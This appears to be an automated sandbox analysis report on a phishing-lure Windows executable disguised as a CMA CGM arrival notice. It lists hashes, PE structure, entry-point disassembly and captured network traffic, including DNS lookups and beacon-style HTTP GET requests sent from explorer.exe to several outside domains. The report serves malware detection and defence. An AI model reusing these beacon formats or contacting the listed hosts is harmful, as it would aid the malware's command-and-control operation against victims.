                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                    • DOS Executable Generic (2002/1) 0.02%
                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                    File name:NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe
                                    File size:466944
                                    MD5:e8bceea59b2074bd08bf68ab55ecdf3e
                                    SHA1:8b62bf811b03fe25924ef6ff4d4afd89c902f7cd
                                    SHA256:0b4684d82509a6e7e0c1cb63174bf68d182ccff75a3d19f16821127605d636b8
                                    SHA512:405f00ffa49ecb3131f0a16afa2b4488c8580c2c8161a0bd4384b9218c9dc74a21812fe6a86f49c16f08959b4743d9f19bb07f7524ce63e6ed339ab01679add1
                                    SSDEEP:12288:8HLEuNNNNN6NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNGvNNNNNNasgTJ4KJ1Z:8HY2csg9h1Z
                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........6...W...W...W...K...W...u...W...q...W..Rich.W..........................PE..L....f=L.................P..........H........`....@

                                    File Icon

                                    Icon Hash:70f0a231b3b2f071

                                    Static PE Info

                                    General

                                    Entrypoint:0x401448
                                    Entrypoint Section:.text
                                    Digitally signed:false
                                    Imagebase:0x400000
                                    Subsystem:windows gui
                                    Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                    DLL Characteristics:
                                    Time Stamp:0x4C3D6691 [Wed Jul 14 07:26:09 2010 UTC]
                                    TLS Callbacks:
                                    CLR (.Net) Version:
                                    OS Version Major:4
                                    OS Version Minor:0
                                    File Version Major:4
                                    File Version Minor:0
                                    Subsystem Version Major:4
                                    Subsystem Version Minor:0
                                    Import Hash:01b006fd37878659f6f60ca0efdc2460

                                    Entrypoint Preview

                                    Instruction
                                    push 00418BE4h
                                    call 00007FCCF073CF75h
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    xor byte ptr [eax], al
                                    add byte ptr [eax], al
                                    inc eax
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [ebx-460B11FDh], bh
                                    sbb al, C4h
                                    dec edi
                                    mov al, byte ptr [9131EA78h]
                                    pop edx
                                    mov edi, 00000000h
                                    add byte ptr [eax], al
                                    add dword ptr [eax], eax
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    push ebx
                                    push 00000074h
                                    jc 00007FCCF073CFEDh
                                    imul esp, dword ptr [ebp+6Eh], 64h
                                    jnc 00007FCCF073CF83h
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add bh, bh
                                    int3
                                    xor dword ptr [eax], eax
                                    push cs
                                    psubd mm4, mm7
                                    xchg eax, ecx

                                    Data Directories

                                    NameVirtual AddressVirtual Size Is in Section
                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x459f40x28.text
                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x480000x2a156.rsrc
                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x2380x20
                                    IMAGE_DIRECTORY_ENTRY_IAT0x10000x134.text
                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                    Sections

                                    NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                    .text0x10000x44f280x45000False0.271176545516data4.83437034271IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                    .data0x460000x148c0x1000False0.00634765625data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                    .rsrc0x480000x2a1560x2b000False0.161876589753data3.15995554576IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                    Resources

                                    NameRVASizeTypeLanguageCountry
                                    RT_ICON0x71bee0x568GLS_BINARY_LSB_FIRST
                                    RT_ICON0x717860x468GLS_BINARY_LSB_FIRST
                                    RT_ICON0x710be0x6c8data
                                    RT_ICON0x707360x988data
                                    RT_ICON0x6fe8e0x8a8dBase IV DBT of @.DBF, block length 1024, next free block index 40, next free block 0, next used block 0
                                    RT_ICON0x6ede60x10a8data
                                    RT_ICON0x6df3e0xea8data
                                    RT_ICON0x6b9960x25a8data
                                    RT_ICON0x6776e0x4228dBase IV DBT of \200.DBF, blocks size 0, block length 16896, next free block index 40, next free block 16711679, next used block 4294934272
                                    RT_ICON0x622e60x5488data
                                    RT_ICON0x58e3e0x94a8data
                                    RT_ICON0x486160x10828dBase IV DBT, blocks size 0, block length 2048, next free block index 40, next free block 0, next used block 0
                                    RT_GROUP_ICON0x485680xaedata
                                    RT_VERSION0x483000x268MS Windows COFF Motorola 68000 object fileEnglishUnited States

                                    Imports

                                    DLLImport
                                    MSVBVM60.DLL_CIcos, _adj_fptan, __vbaVarMove, __vbaFreeVar, __vbaStrVarMove, __vbaFreeVarList, __vbaEnd, _adj_fdiv_m64, __vbaFreeObjList, _adj_fprem1, __vbaSetSystemError, __vbaHresultCheckObj, _adj_fdiv_m32, __vbaAryDestruct, __vbaObjSet, __vbaOnError, _adj_fdiv_m16i, __vbaObjSetAddref, _adj_fdivr_m16i, __vbaVarTstLt, _CIsin, __vbaErase, __vbaChkstk, EVENT_SINK_AddRef, __vbaObjVar, DllFunctionCall, _adj_fpatan, __vbaRedim, EVENT_SINK_Release, _CIsqrt, EVENT_SINK_QueryInterface, __vbaExceptHandler, _adj_fprem, _adj_fdivr_m64, __vbaFPException, __vbaDateVar, _CIlog, __vbaNew2, __vbaInStr, _adj_fdiv_m32i, _adj_fdivr_m32i, __vbaStrCopy, __vbaFreeStrList, __vbaDerefAry1, _adj_fdivr_m32, _adj_fdiv_r, __vbaVarTstNe, __vbaVarAdd, __vbaVarDup, __vbaStrToAnsi, __vbaVarCopy, __vbaLateMemCallLd, _CIatan, __vbaStrMove, __vbaCastObj, _allmul, _CItan, _CIexp, __vbaFreeObj, __vbaFreeStr

                                    Version Infos

                                    DescriptionData
                                    Translation0x0409 0x04b0
                                    InternalNamesmedesvende
                                    FileVersion1.00
                                    CompanyNameKareo
                                    CommentsKareo
                                    ProductNameKareo
                                    ProductVersion1.00
                                    FileDescriptionKareo
                                    OriginalFilenamesmedesvende.exe

                                    Possible Origin

                                    Language of compilation systemCountry where language is spokenMap
                                    EnglishUnited States

                                    Network Behavior

                                    Network Port Distribution

                                    TCP Packets

                                    TimestampSource PortDest PortSource IPDest IP
                                    Sep 13, 2021 22:56:56.874253035 CEST49817443192.168.2.491.184.0.38
                                    Sep 13, 2021 22:56:56.874305010 CEST4434981791.184.0.38192.168.2.4
                                    Sep 13, 2021 22:56:56.874392033 CEST49817443192.168.2.491.184.0.38
                                    Sep 13, 2021 22:56:56.911995888 CEST49817443192.168.2.491.184.0.38
                                    Sep 13, 2021 22:56:56.912024975 CEST4434981791.184.0.38192.168.2.4
                                    Sep 13, 2021 22:56:57.035204887 CEST4434981791.184.0.38192.168.2.4
                                    Sep 13, 2021 22:56:57.035644054 CEST49817443192.168.2.491.184.0.38
                                    Sep 13, 2021 22:56:57.356076956 CEST49817443192.168.2.491.184.0.38
                                    Sep 13, 2021 22:56:57.356105089 CEST4434981791.184.0.38192.168.2.4
                                    Sep 13, 2021 22:56:57.356489897 CEST4434981791.184.0.38192.168.2.4
                                    Sep 13, 2021 22:56:57.356590986 CEST49817443192.168.2.491.184.0.38
                                    Sep 13, 2021 22:56:57.360095978 CEST49817443192.168.2.491.184.0.38
                                    Sep 13, 2021 22:56:57.403137922 CEST4434981791.184.0.38192.168.2.4
                                    Sep 13, 2021 22:56:57.433618069 CEST4434981791.184.0.38192.168.2.4
                                    Sep 13, 2021 22:56:57.433661938 CEST4434981791.184.0.38192.168.2.4
                                    Sep 13, 2021 22:56:57.433687925 CEST4434981791.184.0.38192.168.2.4
                                    Sep 13, 2021 22:56:57.433775902 CEST49817443192.168.2.491.184.0.38
                                    Sep 13, 2021 22:56:57.433809042 CEST49817443192.168.2.491.184.0.38
                                    Sep 13, 2021 22:56:57.433825016 CEST4434981791.184.0.38192.168.2.4
                                    Sep 13, 2021 22:56:57.433842897 CEST4434981791.184.0.38192.168.2.4
                                    Sep 13, 2021 22:56:57.433902025 CEST49817443192.168.2.491.184.0.38
                                    Sep 13, 2021 22:56:57.433959007 CEST49817443192.168.2.491.184.0.38
                                    Sep 13, 2021 22:56:57.466226101 CEST4434981791.184.0.38192.168.2.4
                                    Sep 13, 2021 22:56:57.466272116 CEST4434981791.184.0.38192.168.2.4
                                    Sep 13, 2021 22:56:57.466445923 CEST49817443192.168.2.491.184.0.38
                                    Sep 13, 2021 22:56:57.466470003 CEST4434981791.184.0.38192.168.2.4
                                    Sep 13, 2021 22:56:57.466509104 CEST4434981791.184.0.38192.168.2.4
                                    Sep 13, 2021 22:56:57.466533899 CEST4434981791.184.0.38192.168.2.4
                                    Sep 13, 2021 22:56:57.466538906 CEST49817443192.168.2.491.184.0.38
                                    Sep 13, 2021 22:56:57.466550112 CEST4434981791.184.0.38192.168.2.4
                                    Sep 13, 2021 22:56:57.466635942 CEST49817443192.168.2.491.184.0.38
                                    Sep 13, 2021 22:56:57.466847897 CEST4434981791.184.0.38192.168.2.4
                                    Sep 13, 2021 22:56:57.466872931 CEST4434981791.184.0.38192.168.2.4
                                    Sep 13, 2021 22:56:57.466936111 CEST49817443192.168.2.491.184.0.38
                                    Sep 13, 2021 22:56:57.466945887 CEST4434981791.184.0.38192.168.2.4
                                    Sep 13, 2021 22:56:57.466990948 CEST49817443192.168.2.491.184.0.38
                                    Sep 13, 2021 22:56:57.499340057 CEST4434981791.184.0.38192.168.2.4
                                    Sep 13, 2021 22:56:57.499373913 CEST4434981791.184.0.38192.168.2.4
                                    Sep 13, 2021 22:56:57.499617100 CEST49817443192.168.2.491.184.0.38
                                    Sep 13, 2021 22:56:57.499641895 CEST4434981791.184.0.38192.168.2.4
                                    Sep 13, 2021 22:56:57.499757051 CEST4434981791.184.0.38192.168.2.4
                                    Sep 13, 2021 22:56:57.499758959 CEST49817443192.168.2.491.184.0.38
                                    Sep 13, 2021 22:56:57.499802113 CEST4434981791.184.0.38192.168.2.4
                                    Sep 13, 2021 22:56:57.499838114 CEST4434981791.184.0.38192.168.2.4
                                    Sep 13, 2021 22:56:57.499869108 CEST49817443192.168.2.491.184.0.38
                                    Sep 13, 2021 22:56:57.499979973 CEST49817443192.168.2.491.184.0.38
                                    Sep 13, 2021 22:56:57.499996901 CEST4434981791.184.0.38192.168.2.4
                                    Sep 13, 2021 22:56:57.500094891 CEST49817443192.168.2.491.184.0.38
                                    Sep 13, 2021 22:56:57.500149965 CEST4434981791.184.0.38192.168.2.4
                                    Sep 13, 2021 22:56:57.500170946 CEST4434981791.184.0.38192.168.2.4
                                    Sep 13, 2021 22:56:57.500289917 CEST49817443192.168.2.491.184.0.38
                                    Sep 13, 2021 22:56:57.500308990 CEST4434981791.184.0.38192.168.2.4
                                    Sep 13, 2021 22:56:57.500411034 CEST49817443192.168.2.491.184.0.38
                                    Sep 13, 2021 22:56:57.500426054 CEST4434981791.184.0.38192.168.2.4
                                    Sep 13, 2021 22:56:57.500447989 CEST4434981791.184.0.38192.168.2.4
                                    Sep 13, 2021 22:56:57.500576019 CEST49817443192.168.2.491.184.0.38
                                    Sep 13, 2021 22:56:57.500587940 CEST4434981791.184.0.38192.168.2.4
                                    Sep 13, 2021 22:56:57.500629902 CEST4434981791.184.0.38192.168.2.4
                                    Sep 13, 2021 22:56:57.500648022 CEST4434981791.184.0.38192.168.2.4
                                    Sep 13, 2021 22:56:57.500662088 CEST49817443192.168.2.491.184.0.38
                                    Sep 13, 2021 22:56:57.500669956 CEST4434981791.184.0.38192.168.2.4
                                    Sep 13, 2021 22:56:57.500771999 CEST49817443192.168.2.491.184.0.38
                                    Sep 13, 2021 22:56:57.501121044 CEST4434981791.184.0.38192.168.2.4
                                    Sep 13, 2021 22:56:57.501143932 CEST4434981791.184.0.38192.168.2.4
                                    Sep 13, 2021 22:56:57.501272917 CEST49817443192.168.2.491.184.0.38
                                    Sep 13, 2021 22:56:57.501285076 CEST4434981791.184.0.38192.168.2.4
                                    Sep 13, 2021 22:56:57.501435995 CEST49817443192.168.2.491.184.0.38
                                    Sep 13, 2021 22:56:57.502804041 CEST49817443192.168.2.491.184.0.38
                                    Sep 13, 2021 22:56:57.503644943 CEST4434981791.184.0.38192.168.2.4
                                    Sep 13, 2021 22:56:57.503792048 CEST49817443192.168.2.491.184.0.38
                                    Sep 13, 2021 22:58:27.578078032 CEST4982480192.168.2.4160.153.136.3
                                    Sep 13, 2021 22:58:27.604888916 CEST8049824160.153.136.3192.168.2.4
                                    Sep 13, 2021 22:58:27.605011940 CEST4982480192.168.2.4160.153.136.3
                                    Sep 13, 2021 22:58:27.605200052 CEST4982480192.168.2.4160.153.136.3
                                    Sep 13, 2021 22:58:27.631504059 CEST8049824160.153.136.3192.168.2.4
                                    Sep 13, 2021 22:58:27.631721020 CEST4982480192.168.2.4160.153.136.3
                                    Sep 13, 2021 22:58:27.631783009 CEST4982480192.168.2.4160.153.136.3
                                    Sep 13, 2021 22:58:27.659466982 CEST8049824160.153.136.3192.168.2.4
                                    Sep 13, 2021 22:58:48.715173960 CEST4982580192.168.2.444.227.76.166
                                    Sep 13, 2021 22:58:48.898750067 CEST804982544.227.76.166192.168.2.4
                                    Sep 13, 2021 22:58:48.898989916 CEST4982580192.168.2.444.227.76.166
                                    Sep 13, 2021 22:58:49.083728075 CEST804982544.227.76.166192.168.2.4
                                    Sep 13, 2021 22:58:49.083899975 CEST4982580192.168.2.444.227.76.166
                                    Sep 13, 2021 22:58:49.266762972 CEST804982544.227.76.166192.168.2.4
                                    Sep 13, 2021 22:58:49.279829025 CEST804982544.227.76.166192.168.2.4
                                    Sep 13, 2021 22:58:49.279849052 CEST804982544.227.76.166192.168.2.4
                                    Sep 13, 2021 22:58:49.280071020 CEST4982580192.168.2.444.227.76.166
                                    Sep 13, 2021 22:58:49.280203104 CEST4982580192.168.2.444.227.76.166
                                    Sep 13, 2021 22:58:49.462898970 CEST804982544.227.76.166192.168.2.4
                                    Sep 13, 2021 22:59:09.807353020 CEST4982680192.168.2.434.102.136.180
                                    Sep 13, 2021 22:59:09.824464083 CEST804982634.102.136.180192.168.2.4
                                    Sep 13, 2021 22:59:09.824657917 CEST4982680192.168.2.434.102.136.180
                                    Sep 13, 2021 22:59:10.170882940 CEST4982680192.168.2.434.102.136.180
                                    Sep 13, 2021 22:59:10.187973976 CEST804982634.102.136.180192.168.2.4
                                    Sep 13, 2021 22:59:10.286118984 CEST804982634.102.136.180192.168.2.4
                                    Sep 13, 2021 22:59:10.286139011 CEST804982634.102.136.180192.168.2.4
                                    Sep 13, 2021 22:59:10.286314964 CEST4982680192.168.2.434.102.136.180
                                    Sep 13, 2021 22:59:10.286531925 CEST4982680192.168.2.434.102.136.180
                                    Sep 13, 2021 22:59:10.305299997 CEST804982634.102.136.180192.168.2.4
                                    Sep 13, 2021 22:59:30.622541904 CEST4982880192.168.2.4209.99.40.222

                                    UDP Packets

                                    TimestampSource PortDest PortSource IPDest IP
                                    Sep 13, 2021 22:53:17.570777893 CEST4925753192.168.2.48.8.8.8
                                    Sep 13, 2021 22:53:17.616097927 CEST53492578.8.8.8192.168.2.4
                                    Sep 13, 2021 22:53:44.085283041 CEST6238953192.168.2.48.8.8.8
                                    Sep 13, 2021 22:53:44.120532036 CEST53623898.8.8.8192.168.2.4
                                    Sep 13, 2021 22:53:45.121459007 CEST4991053192.168.2.48.8.8.8
                                    Sep 13, 2021 22:53:45.156969070 CEST53499108.8.8.8192.168.2.4
                                    Sep 13, 2021 22:53:45.888705015 CEST5585453192.168.2.48.8.8.8
                                    Sep 13, 2021 22:53:45.923012018 CEST53558548.8.8.8192.168.2.4
                                    Sep 13, 2021 22:53:46.260446072 CEST6454953192.168.2.48.8.8.8
                                    Sep 13, 2021 22:53:46.295794010 CEST53645498.8.8.8192.168.2.4
                                    Sep 13, 2021 22:53:46.693938017 CEST6315353192.168.2.48.8.8.8
                                    Sep 13, 2021 22:53:46.727649927 CEST53631538.8.8.8192.168.2.4
                                    Sep 13, 2021 22:53:47.301723957 CEST5299153192.168.2.48.8.8.8
                                    Sep 13, 2021 22:53:47.334827900 CEST53529918.8.8.8192.168.2.4
                                    Sep 13, 2021 22:53:47.899444103 CEST5370053192.168.2.48.8.8.8
                                    Sep 13, 2021 22:53:47.925237894 CEST53537008.8.8.8192.168.2.4
                                    Sep 13, 2021 22:53:47.944386005 CEST5172653192.168.2.48.8.8.8
                                    Sep 13, 2021 22:53:47.980165005 CEST53517268.8.8.8192.168.2.4
                                    Sep 13, 2021 22:53:48.700690031 CEST5679453192.168.2.48.8.8.8
                                    Sep 13, 2021 22:53:48.735284090 CEST53567948.8.8.8192.168.2.4
                                    Sep 13, 2021 22:53:49.458976030 CEST5653453192.168.2.48.8.8.8
                                    Sep 13, 2021 22:53:49.485302925 CEST53565348.8.8.8192.168.2.4
                                    Sep 13, 2021 22:53:50.086766005 CEST5662753192.168.2.48.8.8.8
                                    Sep 13, 2021 22:53:50.120359898 CEST53566278.8.8.8192.168.2.4
                                    Sep 13, 2021 22:54:01.290462971 CEST5662153192.168.2.48.8.8.8
                                    Sep 13, 2021 22:54:01.335695982 CEST53566218.8.8.8192.168.2.4
                                    Sep 13, 2021 22:56:56.786725044 CEST6311653192.168.2.48.8.8.8
                                    Sep 13, 2021 22:56:56.835297108 CEST53631168.8.8.8192.168.2.4
                                    Sep 13, 2021 22:57:32.173316956 CEST6407853192.168.2.48.8.8.8
                                    Sep 13, 2021 22:57:32.210340023 CEST53640788.8.8.8192.168.2.4
                                    Sep 13, 2021 22:57:32.929204941 CEST6480153192.168.2.48.8.8.8
                                    Sep 13, 2021 22:57:32.962132931 CEST53648018.8.8.8192.168.2.4
                                    Sep 13, 2021 22:57:37.620874882 CEST6172153192.168.2.48.8.8.8
                                    Sep 13, 2021 22:57:37.654315948 CEST53617218.8.8.8192.168.2.4
                                    Sep 13, 2021 22:57:42.869123936 CEST5125553192.168.2.48.8.8.8
                                    Sep 13, 2021 22:57:42.905035019 CEST53512558.8.8.8192.168.2.4
                                    Sep 13, 2021 22:57:43.128138065 CEST6152253192.168.2.48.8.8.8
                                    Sep 13, 2021 22:57:43.160607100 CEST53615228.8.8.8192.168.2.4
                                    Sep 13, 2021 22:58:27.520945072 CEST5233753192.168.2.48.8.8.8
                                    Sep 13, 2021 22:58:27.570625067 CEST53523378.8.8.8192.168.2.4
                                    Sep 13, 2021 22:58:48.566896915 CEST5504653192.168.2.48.8.8.8
                                    Sep 13, 2021 22:58:48.712940931 CEST53550468.8.8.8192.168.2.4
                                    Sep 13, 2021 22:59:09.748640060 CEST4961253192.168.2.48.8.8.8
                                    Sep 13, 2021 22:59:09.803823948 CEST53496128.8.8.8192.168.2.4
                                    Sep 13, 2021 22:59:25.515871048 CEST4928553192.168.2.48.8.8.8
                                    Sep 13, 2021 22:59:25.561611891 CEST53492858.8.8.8192.168.2.4
                                    Sep 13, 2021 22:59:30.452164888 CEST5060153192.168.2.48.8.8.8
                                    Sep 13, 2021 22:59:30.619622946 CEST53506018.8.8.8192.168.2.4
                                    Sep 13, 2021 22:59:51.422689915 CEST6087553192.168.2.48.8.8.8
                                    Sep 13, 2021 22:59:51.462614059 CEST53608758.8.8.8192.168.2.4
                                    Sep 13, 2021 23:00:11.777059078 CEST5644853192.168.2.48.8.8.8
                                    Sep 13, 2021 23:00:11.817277908 CEST53564488.8.8.8192.168.2.4
                                    Sep 13, 2021 23:00:34.125072002 CEST5917253192.168.2.48.8.8.8
                                    Sep 13, 2021 23:00:34.258972883 CEST53591728.8.8.8192.168.2.4
                                    Sep 13, 2021 23:00:54.493113041 CEST6242053192.168.2.48.8.8.8
                                    Sep 13, 2021 23:00:54.682140112 CEST53624208.8.8.8192.168.2.4
                                    Sep 13, 2021 23:01:15.200295925 CEST6057953192.168.2.48.8.8.8
                                    Sep 13, 2021 23:01:15.464034081 CEST53605798.8.8.8192.168.2.4

                                    DNS Queries

                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                    Sep 13, 2021 22:56:56.786725044 CEST192.168.2.48.8.8.80x86b7Standard query (0)www.paulassinkarchitect.nlA (IP address)IN (0x0001)
                                    Sep 13, 2021 22:58:27.520945072 CEST192.168.2.48.8.8.80xc89aStandard query (0)www.everythingswallow.comA (IP address)IN (0x0001)
                                    Sep 13, 2021 22:58:48.566896915 CEST192.168.2.48.8.8.80x9da3Standard query (0)www.priorpublic.comA (IP address)IN (0x0001)
                                    Sep 13, 2021 22:59:09.748640060 CEST192.168.2.48.8.8.80xd210Standard query (0)www.taylormakeyourlife.comA (IP address)IN (0x0001)
                                    Sep 13, 2021 22:59:30.452164888 CEST192.168.2.48.8.8.80x23c5Standard query (0)www.rlmwebcreations.comA (IP address)IN (0x0001)
                                    Sep 13, 2021 22:59:51.422689915 CEST192.168.2.48.8.8.80x8a61Standard query (0)www.beckyhartpcpublishers.comA (IP address)IN (0x0001)
                                    Sep 13, 2021 23:00:11.777059078 CEST192.168.2.48.8.8.80x2871Standard query (0)www.dominionhavanese.comA (IP address)IN (0x0001)
                                    Sep 13, 2021 23:00:34.125072002 CEST192.168.2.48.8.8.80x7fe4Standard query (0)www.microsoftjob.comA (IP address)IN (0x0001)
                                    Sep 13, 2021 23:00:54.493113041 CEST192.168.2.48.8.8.80x7b4Standard query (0)www.wxsjykj.comA (IP address)IN (0x0001)
                                    Sep 13, 2021 23:01:15.200295925 CEST192.168.2.48.8.8.80xafefStandard query (0)www.acooll.comA (IP address)IN (0x0001)

                                    DNS Answers

                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                    Sep 13, 2021 22:56:56.835297108 CEST8.8.8.8192.168.2.40x86b7No error (0)www.paulassinkarchitect.nl91.184.0.38A (IP address)IN (0x0001)
                                    Sep 13, 2021 22:57:32.210340023 CEST8.8.8.8192.168.2.40xfaaNo error (0)prda.aadg.msidentity.comwww.tm.a.prd.aadg.trafficmanager.netCNAME (Canonical name)IN (0x0001)
                                    Sep 13, 2021 22:58:27.570625067 CEST8.8.8.8192.168.2.40xc89aNo error (0)www.everythingswallow.comeverythingswallow.comCNAME (Canonical name)IN (0x0001)
                                    Sep 13, 2021 22:58:27.570625067 CEST8.8.8.8192.168.2.40xc89aNo error (0)everythingswallow.com160.153.136.3A (IP address)IN (0x0001)
                                    Sep 13, 2021 22:58:48.712940931 CEST8.8.8.8192.168.2.40x9da3No error (0)www.priorpublic.com44.227.76.166A (IP address)IN (0x0001)
                                    Sep 13, 2021 22:58:48.712940931 CEST8.8.8.8192.168.2.40x9da3No error (0)www.priorpublic.com44.227.65.245A (IP address)IN (0x0001)
                                    Sep 13, 2021 22:59:09.803823948 CEST8.8.8.8192.168.2.40xd210No error (0)www.taylormakeyourlife.comtaylormakeyourlife.comCNAME (Canonical name)IN (0x0001)
                                    Sep 13, 2021 22:59:09.803823948 CEST8.8.8.8192.168.2.40xd210No error (0)taylormakeyourlife.com34.102.136.180A (IP address)IN (0x0001)
                                    Sep 13, 2021 22:59:30.619622946 CEST8.8.8.8192.168.2.40x23c5No error (0)www.rlmwebcreations.com209.99.40.222A (IP address)IN (0x0001)
                                    Sep 13, 2021 22:59:51.462614059 CEST8.8.8.8192.168.2.40x8a61No error (0)www.beckyhartpcpublishers.combeckyhartpcpublishers.comCNAME (Canonical name)IN (0x0001)
                                    Sep 13, 2021 22:59:51.462614059 CEST8.8.8.8192.168.2.40x8a61No error (0)beckyhartpcpublishers.com34.102.136.180A (IP address)IN (0x0001)
                                    Sep 13, 2021 23:00:11.817277908 CEST8.8.8.8192.168.2.40x2871Name error (3)www.dominionhavanese.comnonenoneA (IP address)IN (0x0001)
                                    Sep 13, 2021 23:00:34.258972883 CEST8.8.8.8192.168.2.40x7fe4No error (0)www.microsoftjob.com91.195.240.117A (IP address)IN (0x0001)
                                    Sep 13, 2021 23:00:54.682140112 CEST8.8.8.8192.168.2.40x7b4No error (0)www.wxsjykj.com142.111.236.6A (IP address)IN (0x0001)
                                    Sep 13, 2021 23:01:15.464034081 CEST8.8.8.8192.168.2.40xafefNo error (0)www.acooll.com54.65.172.3A (IP address)IN (0x0001)

                                    HTTP Request Dependency Graph

                                    • www.paulassinkarchitect.nl
                                    • www.everythingswallow.com
                                    • www.priorpublic.com
                                    • www.taylormakeyourlife.com
                                    • www.rlmwebcreations.com
                                    • www.beckyhartpcpublishers.com
                                    • www.microsoftjob.com
                                    • www.wxsjykj.com
                                    • www.acooll.com

                                    HTTP Packets

                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    0192.168.2.44981791.184.0.38443C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe
                                    TimestampkBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    1192.168.2.449824160.153.136.380C:\Windows\explorer.exe
                                    TimestampkBytes transferredDirectionData
                                    Sep 13, 2021 22:58:27.605200052 CEST6398OUTGET /kbl2/?X8sl8h70=Uk/4fiNFIrAENImNkq5NhDo1aeiSVlAy2lomCsVKXqRgqDXOUaCk1Fhsw/s2uep8GWm3&t48xlt=YTUh7PIXtPD8u2 HTTP/1.1
                                    Host: www.everythingswallow.com
                                    Connection: close
                                    Data Raw: 00 00 00 00 00 00 00
                                    Data Ascii:
                                    Sep 13, 2021 22:58:27.631504059 CEST6398INHTTP/1.1 302 Found
                                    Connection: close
                                    Pragma: no-cache
                                    cache-control: no-cache
                                    Location: /kbl2/?X8sl8h70=Uk/4fiNFIrAENImNkq5NhDo1aeiSVlAy2lomCsVKXqRgqDXOUaCk1Fhsw/s2uep8GWm3&t48xlt=YTUh7PIXtPD8u2


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    2192.168.2.44982544.227.76.16680C:\Windows\explorer.exe
                                    TimestampkBytes transferredDirectionData
                                    Sep 13, 2021 22:58:49.083899975 CEST6399OUTGET /kbl2/?X8sl8h70=mNAOX+y4WXabTwndEsz1KZpSG28Pw83WrUohbTsiXwD/y5SMj6F01NR7fqmkJVRgJocs&t48xlt=YTUh7PIXtPD8u2 HTTP/1.1
                                    Host: www.priorpublic.com
                                    Connection: close
                                    Data Raw: 00 00 00 00 00 00 00
                                    Data Ascii:
                                    Sep 13, 2021 22:58:49.279829025 CEST6400INHTTP/1.1 307 Temporary Redirect
                                    Server: openresty
                                    Date: Mon, 13 Sep 2021 20:58:49 GMT
                                    Content-Type: text/html; charset=utf-8
                                    Content-Length: 168
                                    Connection: close
                                    Location: http://priorpublic.com
                                    X-Frame-Options: sameorigin
                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 37 20 54 65 6d 70 6f 72 61 72 79 20 52 65 64 69 72 65 63 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 37 20 54 65 6d 70 6f 72 61 72 79 20 52 65 64 69 72 65 63 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                    Data Ascii: <html><head><title>307 Temporary Redirect</title></head><body><center><h1>307 Temporary Redirect</h1></center><hr><center>openresty</center></body></html>


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    3192.168.2.44982634.102.136.18080C:\Windows\explorer.exe
                                    TimestampkBytes transferredDirectionData
                                    Sep 13, 2021 22:59:10.170882940 CEST6400OUTGET /kbl2/?X8sl8h70=daE5tP1a5Tc9nw3OtdYckdcxhowCMZpeWCRMBVYqZOqgoniMKTEvOPxT2vVKGCSF49+A&t48xlt=YTUh7PIXtPD8u2 HTTP/1.1
                                    Host: www.taylormakeyourlife.com
                                    Connection: close
                                    Data Raw: 00 00 00 00 00 00 00
                                    Data Ascii:
                                    Sep 13, 2021 22:59:10.286118984 CEST6401INHTTP/1.1 403 Forbidden
                                    Server: openresty
                                    Date: Mon, 13 Sep 2021 20:59:10 GMT
                                    Content-Type: text/html
                                    Content-Length: 275
                                    ETag: "6139efab-113"
                                    Via: 1.1 google
                                    Connection: close
